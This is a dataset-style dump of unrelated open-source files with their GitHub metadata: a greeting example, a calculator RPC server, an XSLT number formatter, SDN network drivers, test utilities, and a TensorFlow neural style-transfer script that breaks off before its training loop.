],
"symlink_target": ""
} |
'''Hello to you! Illustrates format with {} in print.
'''
person = input('Enter your name: ')
greeting = 'Hello, {}!'.format(person)
print(greeting)
| {
"content_hash": "aeef001305dc1b943e8aa6ed865a74c0",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 54,
"avg_line_length": 25.166666666666668,
"alnum_prop": 0.6622516556291391,
"repo_name": "hwheeler01/comp150",
"id": "eb6c309983884d0173c77bacaf286641ec100ce2",
"size": "151",
"binary": false,
"copies": "2",
"ref": "refs/heads/gh-pages",
"path": "_site/examples/hello_you3.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "11466"
},
{
"name": "Batchfile",
"bytes": "28"
},
{
"name": "CSS",
"bytes": "121532"
},
{
"name": "HTML",
"bytes": "5858311"
},
{
"name": "JavaScript",
"bytes": "524"
},
{
"name": "Jupyter Notebook",
"bytes": "6422478"
},
{
"name": "Python",
"bytes": "365319"
}
],
"symlink_target": ""
} |
from bottle import route, run, request, response, static_file
import barrister
# Our implementation of the 'Calculator' interface in the IDL
class Calculator(object):
# Parameters match the params in the functions in the IDL
def add(self, a, b):
return a+b
def subtract(self, a, b):
return a-b
contract = barrister.contract_from_file("calc.json")
server = barrister.Server(contract)
server.add_handler("Calculator", Calculator())
@route("/api/calc", method='POST')
def calc():
resp_data = server.call_json(request.body.read())
response.content_type = 'application/json; charset=utf-8'
return resp_data
@route("/angularjs/<filename>")
def angularjs(filename):
return static_file(filename, root='angularjs')
run(host="127.0.0.1", port=7667)
| {
"content_hash": "3ea6642d186d5729da040342b0b2fe56",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 61,
"avg_line_length": 28.178571428571427,
"alnum_prop": 0.7046894803548795,
"repo_name": "coopernurse/barrister-js",
"id": "87ae2af7b81317c56567cfe502973e7cc5f23d9f",
"size": "812",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/calc/server.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "93776"
},
{
"name": "Makefile",
"bytes": "755"
},
{
"name": "Shell",
"bytes": "415"
}
],
"symlink_target": ""
} |
from amara.xpath import datatypes
from amara.xslt.numbers import formatter
ASCII_DIGITS = '0123456789'
ASCII_LOWER = 'abcdefghijklmnopqrstuvwxyz'
ASCII_UPPER = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
class english_formatter(formatter):
language = 'en'
_roman_digits = _roman_upper, _roman_lower = [], []
for multiplier, combining in ((1, ''), (1000, u'\u0305')):
for base, one, five, ten in ((1, u'I', u'V', u'X'),
(10, u'X', u'L', u'C'),
(100, u'C', u'D', u'M')):
base *= multiplier
one += combining
five += combining
ten += combining
digits = (u'', one, one*2, one*3, one+five,
five, five+one, five+one*2, five+one*3, one+ten)
_roman_upper.append((base, digits))
_roman_lower.append((base, map(unicode.lower, digits)))
_roman_max = base * len(_roman_upper[-1][1])
def _alpha_sequence(self, number, alphabet):
size = len(alphabet)
digits = ''
while number > size:
number, ordinal = divmod(number - 1, size)
digits += alphabet[ordinal]
digits += alphabet[number - 1]
return digits
def _format(self, number, token, letter_value, separator, grouping):
if token in ('I', 'i') and letter_value != 'alphabetic':
# roman numerals
if 0 < number < self._roman_max:
result = []
for bound, digits in self._roman_digits[token == 'i']:
if number > bound:
index, number = divmod(number, bound)
result.append(digits[index])
last_digits = digits
result = u''.join(result)
else:
result = '%d' % number
elif token in ('A', 'a'):
# alphabetic numbering
alphabet = ASCII_LOWER if token == 'a' else ASCII_UPPER
result = self._alpha_sequence(number, alphabet)
else:
# arabic numerals
if token[-1:] != '1':
# unsupported format token, using '1'
token == '1'
result = '%0*d' % (len(token), number)
if separator and grouping:
start = -len(numeric)
step = -grouping
if start < step:
groups = []
for next in reversed(xrange(step, start, step)):
groups.append(result[start:next])
start = next
groups.append(result[start:])
result = separator.join(groups)
return datatypes.string(result)
| {
"content_hash": "8781835296b86da7029cd044c3b50fe3",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 72,
"avg_line_length": 39.2,
"alnum_prop": 0.4905247813411079,
"repo_name": "zepheira/amara",
"id": "aceb8328ed63c098bca96679567a0daca33bb9f1",
"size": "2845",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/xslt/numbers/en.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "1830216"
},
{
"name": "C++",
"bytes": "82201"
},
{
"name": "GLSL",
"bytes": "5081"
},
{
"name": "HTML",
"bytes": "578831"
},
{
"name": "JavaScript",
"bytes": "18734"
},
{
"name": "Logos",
"bytes": "175"
},
{
"name": "Objective-C",
"bytes": "26041"
},
{
"name": "Python",
"bytes": "1507578"
},
{
"name": "Shell",
"bytes": "2497"
},
{
"name": "XSLT",
"bytes": "398316"
}
],
"symlink_target": ""
} |
from quantum.openstack.common import uuidutils
from quantum.plugins.nec.common import ofc_client
from quantum.plugins.nec import ofc_driver_base
class TremaDriverBase(ofc_driver_base.OFCDriverBase):
"""Common class for Trema (Sliceable Switch) Drivers"""
networks_path = "/networks"
network_path = "/networks/%s"
def __init__(self, conf_ofc):
# Trema sliceable REST API does not support HTTPS
self.client = ofc_client.OFCClient(host=conf_ofc.host,
port=conf_ofc.port)
def create_tenant(self, description, tenant_id=None):
return tenant_id or uuidutils.generate_uuid()
def update_tenant(self, ofc_tenant_id, description):
pass
def delete_tenant(self, ofc_tenant_id):
pass
def create_network(self, ofc_tenant_id, description, network_id=None):
ofc_network_id = network_id or uuidutils.generate_uuid()
body = {'id': ofc_network_id, 'description': description}
self.client.post(self.networks_path, body=body)
return ofc_network_id
def update_network(self, ofc_tenant_id, ofc_network_id, description):
path = self.network_path % ofc_network_id
body = {'description': description}
return self.client.put(path, body=body)
def delete_network(self, ofc_tenant_id, ofc_network_id):
path = self.network_path % ofc_network_id
return self.client.delete(path)
def update_port(self, ofc_tenant_id, ofc_network_id, ofc_port_id,
portinfo):
self.delete_port(ofc_tenant_id, ofc_network_id, ofc_port_id)
self.create_port(ofc_tenant_id, ofc_network_id, portinfo, ofc_port_id)
class TremaFilterDriver(object):
"""Trema (Sliceable Switch) PacketFilter Driver"""
filters_path = "/filters"
filter_path = "/filters/%s"
@classmethod
def filter_supported(cls):
return True
def create_filter(self, ofc_tenant_id, ofc_network_id, filter_dict,
portinfo=None, filter_id=None):
if filter_dict['action'].upper() in ["ACCEPT", "ALLOW"]:
ofc_action = "ALLOW"
elif filter_dict['action'].upper() in ["DROP", "DENY"]:
ofc_action = "DENY"
body = {'priority': filter_dict['priority'],
'slice': ofc_network_id,
'action': ofc_action}
ofp_wildcards = ["dl_vlan", "dl_vlan_pcp", "nw_tos"]
if portinfo:
body['in_datapath_id'] = portinfo.datapath_id
body['in_port'] = portinfo.port_no
else:
body['wildcards'] = "in_datapath_id"
ofp_wildcards.append("in_port")
if filter_dict['src_mac']:
body['dl_src'] = filter_dict['src_mac']
else:
ofp_wildcards.append("dl_src")
if filter_dict['dst_mac']:
body['dl_dst'] = filter_dict['dst_mac']
else:
ofp_wildcards.append("dl_dst")
if filter_dict['src_cidr']:
body['nw_src'] = filter_dict['src_cidr']
else:
ofp_wildcards.append("nw_src:32")
if filter_dict['dst_cidr']:
body['nw_dst'] = filter_dict['dst_cidr']
else:
ofp_wildcards.append("nw_dst:32")
if filter_dict['protocol']:
if filter_dict['protocol'].upper() in "ICMP":
body['dl_type'] = "0x800"
body['nw_proto'] = hex(1)
elif filter_dict['protocol'].upper() in "TCP":
body['dl_type'] = "0x800"
body['nw_proto'] = hex(6)
elif filter_dict['protocol'].upper() in "UDP":
body['dl_type'] = "0x800"
body['nw_proto'] = hex(17)
elif filter_dict['protocol'].upper() in "ARP":
body['dl_type'] = "0x806"
ofp_wildcards.append("nw_proto")
else:
body['nw_proto'] = filter_dict['protocol']
if filter_dict['eth_type']:
body['dl_type'] = filter_dict['eth_type']
else:
ofp_wildcards.append("dl_type")
else:
ofp_wildcards.append("dl_type")
ofp_wildcards.append("nw_proto")
if filter_dict['src_port']:
body['tp_src'] = hex(filter_dict['src_port'])
else:
ofp_wildcards.append("tp_src")
if filter_dict['dst_port']:
body['tp_dst'] = hex(filter_dict['dst_port'])
else:
ofp_wildcards.append("tp_dst")
ofc_filter_id = filter_id or uuidutils.generate_uuid()
body['id'] = ofc_filter_id
body['ofp_wildcards'] = ','.join(ofp_wildcards)
self.client.post(self.filters_path, body=body)
return ofc_filter_id
def delete_filter(self, ofc_tenant_id, ofc_network_id, ofc_filter_id):
path = self.filter_path % ofc_filter_id
return self.client.delete(path)
class TremaPortBaseDriver(TremaDriverBase, TremaFilterDriver):
"""Trema (Sliceable Switch) Driver for port base binding
TremaPortBaseDriver uses port base binding.
Ports are identified by datapath_id, port_no and vlan_id.
"""
ports_path = "/networks/%s/ports"
port_path = "/networks/%s/ports/%s"
def create_port(self, ofc_tenant_id, ofc_network_id, portinfo,
port_id=None):
ofc_port_id = port_id or uuidutils.generate_uuid()
path = self.ports_path % ofc_network_id
body = {'id': ofc_port_id,
'datapath_id': portinfo.datapath_id,
'port': str(portinfo.port_no),
'vid': str(portinfo.vlan_id)}
self.client.post(path, body=body)
return ofc_port_id
def delete_port(self, ofc_tenant_id, ofc_network_id, ofc_port_id):
path = self.port_path % (ofc_network_id, ofc_port_id)
return self.client.delete(path)
class TremaPortMACBaseDriver(TremaDriverBase, TremaFilterDriver):
"""Trema (Sliceable Switch) Driver for port-mac base binding
TremaPortBaseDriver uses port-mac base binding.
Ports are identified by datapath_id, port_no, vlan_id and mac.
"""
ports_path = "/networks/%s/ports"
port_path = "/networks/%s/ports/%s"
attachments_path = "/networks/%s/ports/%s/attachments"
attachment_path = "/networks/%s/ports/%s/attachments/%s"
def create_port(self, ofc_tenant_id, ofc_network_id, portinfo,
port_id=None):
#NOTE: This Driver create slices with Port-MAC Based bindings on Trema
# Sliceable. It's REST API requires Port Based binding before you
# define Port-MAC Based binding.
ofc_port_id = port_id or uuidutils.generate_uuid()
dummy_port_id = "dummy-%s" % ofc_port_id
path = self.ports_path % ofc_network_id
body = {'id': dummy_port_id,
'datapath_id': portinfo.datapath_id,
'port': str(portinfo.port_no),
'vid': str(portinfo.vlan_id)}
self.client.post(path, body=body)
path = self.attachments_path % (ofc_network_id, dummy_port_id)
body = {'id': ofc_port_id, 'mac': portinfo.mac}
self.client.post(path, body=body)
path = self.port_path % (ofc_network_id, dummy_port_id)
self.client.delete(path)
return ofc_port_id
def delete_port(self, ofc_tenant_id, ofc_network_id, ofc_port_id):
dummy_port_id = "dummy-%s" % ofc_port_id
path = self.attachment_path % (ofc_network_id, dummy_port_id,
ofc_port_id)
return self.client.delete(path)
class TremaMACBaseDriver(TremaDriverBase):
"""Trema (Sliceable Switch) Driver for mac base binding
TremaPortBaseDriver uses mac base binding.
Ports are identified by mac.
"""
attachments_path = "/networks/%s/attachments"
attachment_path = "/networks/%s/attachments/%s"
@classmethod
def filter_supported(cls):
return False
def create_port(self, ofc_tenant_id, ofc_network_id, portinfo,
port_id=None):
ofc_port_id = port_id or uuidutils.generate_uuid()
path = self.attachments_path % ofc_network_id
body = {'id': ofc_port_id, 'mac': portinfo.mac}
self.client.post(path, body=body)
return ofc_port_id
def delete_port(self, ofc_tenant_id, ofc_network_id, ofc_port_id):
path = self.attachment_path % (ofc_network_id, ofc_port_id)
return self.client.delete(path)
| {
"content_hash": "6907b2e1ab4aa50b05b0afd11917e7e2",
"timestamp": "",
"source": "github",
"line_count": 230,
"max_line_length": 79,
"avg_line_length": 37.030434782608694,
"alnum_prop": 0.58635669836797,
"repo_name": "rossella/neutron",
"id": "38c7e395008993ccb4bb458a9322235a18306773",
"size": "9215",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "quantum/plugins/nec/drivers/trema.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67928"
},
{
"name": "Perl",
"bytes": "235"
},
{
"name": "Python",
"bytes": "3048930"
},
{
"name": "Shell",
"bytes": "7843"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
} |
import os
from twitter.common.contextutil import temporary_file
from pex.testing import run_simple_pex_test
def test_pex_execute():
body = "print('Hello')"
_, rc = run_simple_pex_test(body, coverage=True)
assert rc == 0
def test_pex_raise():
body = "raise Exception('This will improve coverage.')"
run_simple_pex_test(body, coverage=True)
def test_pex_interpreter():
with temporary_file() as fp:
fp.write(b"print('Hello world')")
fp.flush()
env = os.environ.copy()
env['PEX_INTERPRETER'] = '1'
so, rc = run_simple_pex_test("", args=(fp.name,), coverage=True, env=env)
assert so == b'Hello world\n'
assert rc == 0
| {
"content_hash": "86c45f86ce68fbdb21582dad532159d8",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 77,
"avg_line_length": 22.862068965517242,
"alnum_prop": 0.6576168929110106,
"repo_name": "jamesbroadhead/pex",
"id": "4ec03abf3228a1963723099d49ee147570cb3676",
"size": "795",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_integration.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "299676"
},
{
"name": "Shell",
"bytes": "348"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import logging
import shutil
from unittest import TestCase
import keras.backend as K
from bigdl.dllib.nncontext import *
from bigdl.dllib.feature.image import ImageSet
np.random.seed(1337) # for reproducibility
class ZooTestCase(TestCase):
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('py4j').setLevel(logging.INFO)
def setup_method(self, method):
"""
Setup any state tied to the execution of the given method in a class.
It is invoked for every test method of a class.
"""
K.set_image_dim_ordering("th")
sparkConf = init_spark_conf().setMaster("local[4]").setAppName("zoo test case")\
.set("spark.driver.memory", "5g")
assert str(sparkConf.get("spark.shuffle.reduceLocality.enabled")) == "false"
assert \
str(sparkConf.get("spark.serializer")) == "org.apache.spark.serializer.JavaSerializer"
assert SparkContext._active_spark_context is None
self.sc = init_nncontext(sparkConf)
self.sc.setLogLevel("ERROR")
self.sqlContext = SQLContext(self.sc)
self.tmp_dirs = []
def teardown_method(self, method):
"""
Teardown any state that was previously setup with a setup_method call.
"""
K.set_image_dim_ordering("th")
self.sc.stop()
if hasattr(self, "tmp_dirs"):
for d in self.tmp_dirs:
shutil.rmtree(d)
def create_temp_dir(self):
tmp_dir = tempfile.mkdtemp()
self.tmp_dirs.append(tmp_dir)
return tmp_dir
def assert_allclose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
# from tensorflow
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b), np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol, err_msg=msg)
def assert_list_allclose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
for (i1, i2) in zip(a, b):
self.assert_allclose(i1, i2, rtol, atol, msg)
def compare_loss(self, y_a, y_b, kloss, zloss, rtol=1e-6, atol=1e-6):
"""
Compare forward results for Keras loss against Zoo loss.
# Arguments
y_a: input/y_pred
y_b: target/y_true
"""
keras_output = np.mean(K.eval(kloss(K.variable(y_b), K.variable(y_a))))
zoo_output = zloss.forward(y_a, y_b)
np.testing.assert_allclose(zoo_output, keras_output, rtol=rtol, atol=atol)
def compare_layer(self, klayer, zlayer, input_data, weight_converter=None,
is_training=False, rtol=1e-6, atol=1e-6):
"""
Compare forward results for Keras layer against Zoo Keras API layer.
"""
from keras.models import Sequential as KSequential
from bigdl.dllib.keras.models import Sequential as ZSequential
zmodel = ZSequential()
zmodel.add(zlayer)
kmodel = KSequential()
kmodel.add(klayer)
koutput = kmodel.predict(input_data)
from bigdl.dllib.keras.layers import BatchNormalization
if isinstance(zlayer, BatchNormalization):
k_running_mean = K.eval(klayer.running_mean)
k_running_std = K.eval(klayer.running_std)
zlayer.set_running_mean(k_running_mean)
zlayer.set_running_std(k_running_std)
if kmodel.get_weights():
zmodel.set_weights(weight_converter(klayer, kmodel.get_weights()))
zmodel.training(is_training)
zoutput = zmodel.forward(input_data)
self.assert_allclose(zoutput, koutput, rtol=rtol, atol=atol)
def compare_model(self, zmodel, kmodel, input_data, rtol=1e-5, atol=1e-5):
"""
Compare forward results for Keras model against Zoo Keras API model.
"""
from bigdl.dllib.keras.converter import WeightLoader
WeightLoader.load_weights_from_kmodel(zmodel, kmodel)
zmodel.training(is_training=False)
bigdl_output = zmodel.forward(input_data)
keras_output = kmodel.predict(input_data)
self.assert_allclose(bigdl_output, keras_output, rtol=rtol, atol=atol)
def assert_forward_backward(self, model, input_data):
"""
Test whether forward and backward can work properly.
"""
output = model.forward(input_data)
grad_input = model.backward(input_data, output)
def assert_zoo_model_save_load(self, model, input_data, rtol=1e-6, atol=1e-6):
"""
Test for ZooModel save and load.
The loaded model should have the same class as the original model.
The loaded model should produce the same forward and backward results as the original model.
"""
model_class = model.__class__
tmp_path = create_tmp_path() + ".bigdl"
model.save_model(tmp_path, over_write=True)
loaded_model = model_class.load_model(tmp_path)
assert isinstance(loaded_model, model_class)
self.compare_output_and_grad_input(model, loaded_model, input_data, rtol, atol)
os.remove(tmp_path)
def assert_tfpark_model_save_load(self, model, input_data, rtol=1e-6, atol=1e-6):
model_class = model.__class__
tmp_path = create_tmp_path() + ".h5"
model.save_model(tmp_path)
loaded_model = model_class.load_model(tmp_path)
assert isinstance(loaded_model, model_class)
# Calling predict will remove the impact of dropout.
output1 = model.predict(input_data)
output2 = loaded_model.predict(input_data, distributed=True)
if isinstance(output1, list):
self.assert_list_allclose(output1, output2, rtol, atol)
else:
self.assert_allclose(output1, output2, rtol, atol)
os.remove(tmp_path)
def compare_output_and_grad_input(self, model1, model2, input_data, rtol=1e-6, atol=1e-6):
# Set seed in case of random factors such as dropout.
rng = RNG()
rng.set_seed(1000)
output1 = model1.forward(input_data)
rng.set_seed(1000)
output2 = model2.forward(input_data)
if isinstance(output1, list):
self.assert_list_allclose(output1, output2, rtol, atol)
else:
self.assert_allclose(output1, output2, rtol, atol)
rng.set_seed(1000)
grad_input1 = model1.backward(input_data, output1)
rng.set_seed(1000)
grad_input2 = model2.backward(input_data, output1)
if isinstance(grad_input1, list):
self.assert_list_allclose(grad_input1, grad_input2, rtol, atol)
else:
self.assert_allclose(grad_input1, grad_input2, rtol, atol)
def compare_output_and_grad_input_set_weights(self, model1, model2, input_data,
rtol=1e-6, atol=1e-6):
if model1.get_weights():
model2.set_weights(model1.get_weights())
self.compare_output_and_grad_input(model1, model2, input_data, rtol, atol)
def intercept(self, func, error_message):
error = False
try:
func()
except Exception as e:
if error_message not in str(e):
raise Exception("error_message not in the exception raised. " +
"error_message: %s, exception: %s" % (error_message, e))
error = True
if not error:
raise Exception("exception is not raised")
def get_raw_image_set(self, with_label):
resource_path = os.path.join(os.path.split(__file__)[0], "../../resources")
if with_label:
image_folder = os.path.join(resource_path, "cat_dog")
else:
image_folder = os.path.join(resource_path, "cat_dog/*")
image_set = ImageSet.read(image_folder, with_label=with_label, sc=get_spark_context(),
one_based_label=False)
return image_set
| {
"content_hash": "cf445a8a5638fe0e49e17e31d2828b75",
"timestamp": "",
"source": "github",
"line_count": 207,
"max_line_length": 100,
"avg_line_length": 41.71980676328502,
"alnum_prop": 0.6008568781843446,
"repo_name": "yangw1234/BigDL",
"id": "8a33f0bf44cb2353660383b6dea678885a9b308d",
"size": "9223",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "python/dllib/test/bigdl/test_zoo_utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "5342"
},
{
"name": "Dockerfile",
"bytes": "138760"
},
{
"name": "Java",
"bytes": "1321348"
},
{
"name": "Jupyter Notebook",
"bytes": "54063856"
},
{
"name": "Lua",
"bytes": "1904"
},
{
"name": "Makefile",
"bytes": "19253"
},
{
"name": "PowerShell",
"bytes": "1137"
},
{
"name": "PureBasic",
"bytes": "593"
},
{
"name": "Python",
"bytes": "8762180"
},
{
"name": "RobotFramework",
"bytes": "16117"
},
{
"name": "Scala",
"bytes": "13216038"
},
{
"name": "Shell",
"bytes": "844916"
}
],
"symlink_target": ""
} |
import tensorflow as tf
import numpy as np
from functools import reduce
from PIL import Image
## ----------- ----------- ----------- ----------- ----------- -----------
VGG19_LAYERS = (
'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1',
'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2',
'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3',
'relu3_3', 'conv3_4', 'relu3_4', 'pool3',
'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3',
'relu4_3', 'conv4_4', 'relu4_4', 'pool4',
'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',
'relu5_3', 'conv5_4', 'relu5_4'
)
## 用 dictionary 的方式回傳整個 network
def net_preloaded(input_image, pooling):
data_dict = np.load('libs/vgg19.npy', encoding='latin1').item()
net = {}
current = input_image
for i, name in enumerate(VGG19_LAYERS):
kind = name[:4]
if kind == 'conv':
kernels = get_conv_filter(data_dict, name)
# kernels = np.transpose(kernels, (1, 0, 2, 3))
bias = get_bias(data_dict, name)
# matconvnet: weights are [width, height, in_channels, out_channels]
# tensorflow: weights are [height, width, in_channels, out_channels]
# bias = bias.reshape(-1)
current = conv_layer(current, kernels, bias)
elif kind == 'relu':
current = tf.nn.relu(current)
elif kind == 'pool':
current = pool_layer(current, pooling)
net[name] = current
assert len(net) == len(VGG19_LAYERS)
return net
## ----------- ----------- ----------- ----------- ----------- -----------
## start from here ! ##
## 先設定好要取用哪些層作為 CONTENT_LAYERS & STYLE_LAYERS
# feel free to try different layers
CONTENT_LAYERS = ('relu4_2', 'relu5_2')
STYLE_LAYERS = ('relu1_1', 'relu2_1', 'relu3_1', 'relu4_1', 'relu5_1')
VGG_MEAN = [103.939, 116.779, 123.68]
def stylize(content, styles, network_path='libs/imagenet-vgg-verydeep-19.mat',
iterations=1000, content_weight=5e0, content_weight_blend=0.5, style_weight=5e2,
style_layer_weight_exp=1, style_blend_weights=None, tv_weight=100,
learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08, pooling='avg',
print_iterations=100, checkpoint_iterations=100, checkpoint_path=None,
output_path=None):
shape = (1,) + content.shape # content image shape : (1, 433, 770, 3)
style_shapes = [(1,) + style.shape for style in styles] # style image shape : (1, 600, 800, 3)
content_features = {}
style_features = [{} for _ in styles]
## 取出每一層指定 STYLE_LAYERS 的 weight, 並看要不要
# scale the importance of each style layers according to their depth.
# (deeper layers are more important if style_layers_weights > 1 (default = 1))
layer_weight = 1.0
style_layers_weights = {} # weight for different network layers
for style_layer in STYLE_LAYERS:
style_layers_weights[style_layer] = layer_weight #'relu1_1','relu2_1',...,'relu5_1'
layer_weight *= style_layer_weight_exp # 1.0
## 對每一層 style layer 的 weights 做 normalize
# normalize style layer weights
layer_weights_sum = 0
for style_layer in STYLE_LAYERS: #'relu1_1',..., 'relu5_1'
layer_weights_sum += style_layers_weights[style_layer] # 5.0
for style_layer in STYLE_LAYERS:
style_layers_weights[style_layer] /= layer_weights_sum
## 算出 content_image 進入 model 後, 在每一層 CONTENT_LAYERS 的輸出, 存在 content_features
# FEATURE MAPS FROM CONTENT IMAGE
# compute the feature map of the content image by feeding it into the network
# the output net contains the features of each content layer
g = tf.Graph()
with g.as_default(), tf.Session() as sess:
image = tf.placeholder('float', shape=shape)
net = net_preloaded(image, pooling) # {'conv1_1':Tensor,relu1_1:Tensor...}
content_pre = np.array([preprocess(content)]) # (1,433,770,3) subtract the mean pixel
for layer in CONTENT_LAYERS: # 'relu4_2', 'relu5_2'
content_features[layer] = net[layer].eval(feed_dict={image: content_pre})
## 將 style image 輸入後, 每一層 STYLE LAYER 的 output 轉換成 gram matrix
## gram matrix: 把每一張 filter 掃出來的 feature maps 拉直, 自乘成一個二維矩陣
# FEATURE MAPS (GRAM MATRICES) FROM STYLE IMAGE
# compute style features of the style image by feeding it into the network
# and calculate the gram matrix
for i in range(len(styles)):
g = tf.Graph()
with g.as_default(), tf.Session() as sess:
image = tf.placeholder('float', shape=style_shapes[i])
net = net_preloaded(image, pooling)
style_pre = np.array([preprocess(styles[i])])
for layer in STYLE_LAYERS: #'relu1_1', 'relu2_1',..., 'relu5_1'
features = net[layer].eval(feed_dict={image: style_pre}) # relu_1:(1,600,800,64)
features = np.reshape(features, (-1, features.shape[3])) # (480000, 64)
gram = np.matmul(features.T, features) / features.size # (64,64)
style_features[i][layer] = gram
## 前面的部分, 是在取出特定 layer (CONTENT_LAYERS & STYLE_LAYERS) 的 weight, 或是圖片進去後該層的 output
## 並存在 content_features & style_features 中
## -- 下面開始才是主要的 graph (network) --
# make stylized image using backpropogation
with tf.Graph().as_default():
## 隨機生成 image
# Generate a random image (the output image) with the same shape as the content image
initial = tf.random_normal(shape) * 0.256
image = tf.Variable(initial)
net = net_preloaded(image, pooling)
## 這邊隨機生成這張圖片 (image), 就是最後要輸出的圖片
## 他不是用 placeholder, 而是用 variable !
## 所以等等更新回來的時候, 會一路更新回到圖片上
## (很像這個圖片也是 weight 的感覺, 每次執行 train_step 他都會被更新)
## 而現在這個 net 也才是最主要的 network (講義圖片中間的那個)
## 計算隨機生成的 image 的 content_loss
# CONTENT LOSS
# we can adjust the weight of each content layers
# content_weight_blend is the ratio of two used content layers in this example
content_layers_weights = {}
content_layers_weights['relu4_2'] = content_weight_blend
content_layers_weights['relu5_2'] = 1.0 - content_weight_blend
content_loss = 0
content_losses = []
## 上面給的一些預設值
# CONTENT_LAYERS = ('relu4_2', 'relu5_2')
# content_weight = 5e0 (= 5.0)
# content_layers_weights: 上面幾行設定的, 給每一層的一個權重
# content_features: image 經過 content layer 後的輸出 (feature map)
## loss 的部分
## 都是在看現在主要的 net (講義中間), 跟左右兩邊, 在特定層上面 output 的差異
## L2-norm loss: output = sum(input ** 2) / 2
for content_layer in CONTENT_LAYERS:
# Use MSE as content losses
# content weight is the coefficient for content loss
content_losses.append(
content_layers_weights[content_layer] * content_weight *
(2 * tf.nn.l2_loss(net[content_layer] - content_features[content_layer]) /
content_features[content_layer].size)
)
content_loss += reduce(tf.add, content_losses)
## 最後所有 content_loss SUM 起來
## 計算隨機生成的 image 的 style_loss
# STYLE LOSS
# We can specify different weight for different style images
# style_layers_weights => weight for different network layers
# style_blend_weights => weight between different style images
if style_blend_weights is None:
style_blend_weights = [1.0/len(style_images) for _ in style_images]
else:
total_blend_weight = sum(style_blend_weights)
# normalization
style_blend_weights = [weight/total_blend_weight for weight in style_blend_weights]
style_loss = 0
# iterate to calculate style loss with multiple style images
for i in range(len(styles)):
style_losses = []
for style_layer in STYLE_LAYERS: # e.g. relu1_1
layer = net[style_layer] # relu1_1 of output image:(1,433,770,64)
_, height, width, number = map(lambda i: i.value, layer.get_shape())
size = height * width * number
feats = tf.reshape(layer, (-1, number)) # (333410,64)
# Gram matrix for the features in relu1_1 of the output image.
gram = tf.matmul(tf.transpose(feats), feats) / size
# Gram matrix for the features in relu1_1 of the style image
style_gram = style_features[i][style_layer]
## 這邊 style loss 的計算和上面很像
## 差別只在於, 剛剛是在算指定層的 output, 現在改成算 指定層的 output 的 `gram_matrix`
## (再多經過一個轉換而已)
# Style loss is the MSE for the difference of the 2 Gram matrices
style_losses.append( style_layers_weights[style_layer] * 2 *
tf.nn.l2_loss(gram - style_gram) / style_gram.size )
style_loss += style_weight * style_blend_weights[i] * reduce(tf.add, style_losses)
## style_weight: 5e2 (500)
# TOTAL VARIATION LOSS
## 這裡比講義上面的解說圖片, 還多算了一種 loss
## 他是拿鄰近的 pixel 算 loss...
## (在算同一張圖片, 上下平移一格 或是左右平移一格 的 loss)
# Total variation denoising to do smoothing; cost to penalize neighboring pixel
# not used by the original paper by Gatys et al
# According to the paper Mahendran, Aravindh, and Andrea Vedaldi. "Understanding deep
# image representations by inverting them."
# Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. 2015.
tv_y_size = _tensor_size(image[:,1:,:,:])
tv_x_size = _tensor_size(image[:,:,1:,:])
tv_loss = tv_weight * 2 * (
(tf.nn.l2_loss(image[:,1:,:,:] - image[:,:shape[1]-1,:,:]) / tv_y_size) +
(tf.nn.l2_loss(image[:,:,1:,:] - image[:,:,:shape[2]-1,:]) / tv_x_size)
)
## tv_weight: 100
# OVERALL LOSS
## 最後把三種 loss 加總, 更新這個 loss
## content_weight, style_weight, tv_weight 這三個權重應該都寫在這邊, 加總的時候再乘權重比較好
loss = content_loss + style_loss + tv_loss
## 下面執行 train_step 來 minimize loss
## 全部的運算都只更新主要 net (講義圖片中間的部分)
## 這裡特殊的地方在他不僅更新 network 的參數, 還更新回去生成的圖片上
train_step = tf.train.AdamOptimizer(learning_rate, beta1, beta2, epsilon).minimize(loss)
def print_progress():
print('======================================================\n')
print(' iteration: %d' % i)
print(' content loss: %g' % content_loss.eval())
print(' style loss: %g' % style_loss.eval())
print(' tv loss: %g' % tv_loss.eval())
print(' total loss: %g\n' % loss.eval())
def imsave(path, img):
img = np.clip(img, 0, 255).astype(np.uint8)
Image.fromarray(img).save(path, quality=95)
# TRAINING
